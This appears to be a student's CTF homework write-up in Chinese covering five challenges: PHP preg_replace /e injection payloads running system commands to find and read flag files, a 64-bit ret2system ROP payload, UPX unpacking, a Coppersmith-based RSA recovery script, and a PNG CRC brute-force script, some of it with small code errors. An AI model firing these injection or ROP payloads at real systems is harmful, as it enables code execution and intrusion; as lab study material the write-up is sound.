当前位置：首页 > news >正文

2.16作业

news 来源：原创 2025/5/22 20:37:46

1

php://input和data://text/plain协议执行system(“ls”)都失败

尝试读源代码php://filter/read=convert.base64-encode/resource=index.php

【pattern如果使用了/e 修正符， preg_replace() 会把 replacement 参数当作 PHP 代码执行】

preg_replace（）pat,rep,sub变量：

bp抓包X-Forwarded-For:127.0.0.1

?pat=/test/e&rep=system("cd s3chahahaDir/flag;ls -la")&sub=test

?pat=/test/e&rep=system("cat s3chahahaDir/flag/flag.php")&sub=test

更好用的payload：index.php?pat=/test/e&rep=system("find / -name flag*")&sub=a

index.php?pat=/test/e&rep=system("cat /var/www/html/s3chahahaDir/flag/flag.php")&sub=a

2我把她弄丢了

组合system和/bin/sh（64位函数参数通过寄存器传递）

把/bin/sh字符串地址放到rdi里，再调用system函数

pop rdi /bin/sh ret

ELF文件：

elf=ELF('./a')

shell=elf.plt['system']

payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(0x402008)+p64(r)+p64(shell)

3UPX

upx脱不了壳，010查看（对比address in国家队）【UPX标志：大写UPX】

脱壳完又是base64但是换码表（跟期末考核一样的脚本跑就好）

（试了试cyberchef更好用）

4

 sage.all_cmdline import *
from Crypto.Util.number import long_to_bytes
from gmpy2 import invert,iroot,gcd,mpz,powmod

e = 65537
n = 79239019133008902130006198964639844798771408211660544649405418249108104979283858140199725213927656792578582828912684320882248828512464244641351915288069266378046829511827542801945752252863425605946379775869602719406340271702260307900825314967696531175183205977973427572862807386846990514994510850414958255877
c = 45457869965165575324534408050513326739799864850578881475341543330291990558135968254698676312246850389922318827771380881195754151389802803398367341521544667542828862543407738361578535730524976113729406101764290984943061582342991118766322793847422471903811686775249409300301726906738475446634950949059180072008
a = 9303981927028382051386918702900550228062240363697933771286553052631411452412621158116514735706670764224584958899184294505751247393129887316131576567242619
b = 9007779281398842447745292673398186664639261529076471011805234554666556577498532370235883716552696783469143334088312327338274844469338982242193952226631913
y = 970090448249525757357772770885678889252473675418473052487452323704761315577270362842929142427322075233537587085124672615901229826477368779145818623466854

# y**2 = x**3 + a * x + b
PR.<x> = PolynomialRing(Zmod(n))
f = x ** 3 + a * x + b - y ** 2
f = f.monic()
pp = f.small_roots(X=2^64, beta=0.4,epsilon = 0.01)[0]
#9757458594430450711
x0 = mpz(pp)
kp = x0 ** 3 + a * x0 + b - y ** 2
p = gcd(kp,mpz(n))
q = n//p
phi = (p-1)*(q-1)
d = invert(e,phi)
m = powmod(c,d,n)
flag = long_to_bytes(m)
print(flag)

5


import zlib
import struct

with open(r"1.png",'rb') as image_data:
    bin_data = image_data.read()
data = bytearray(bin_data[12:29])
cec32key = struct.unpack('>I',bin_data[29:33])[0]
n=4096#0x0fff
for w in range(n):
    width = bytearray(struct.pack('>i',w))
    for h in range(n):
        height =bytearray(struct.pack('>i',h))
        

        for x in range(4):
            data[x+4]=width[x]
            data[x+8]=height[x]
        crc32result ==zlib.crc32(data)
        if crc32result==crc32key:
            print("高：%s 宽：%s"%(bytearray(width).hex(),bytearray(height).hex()))
            exit()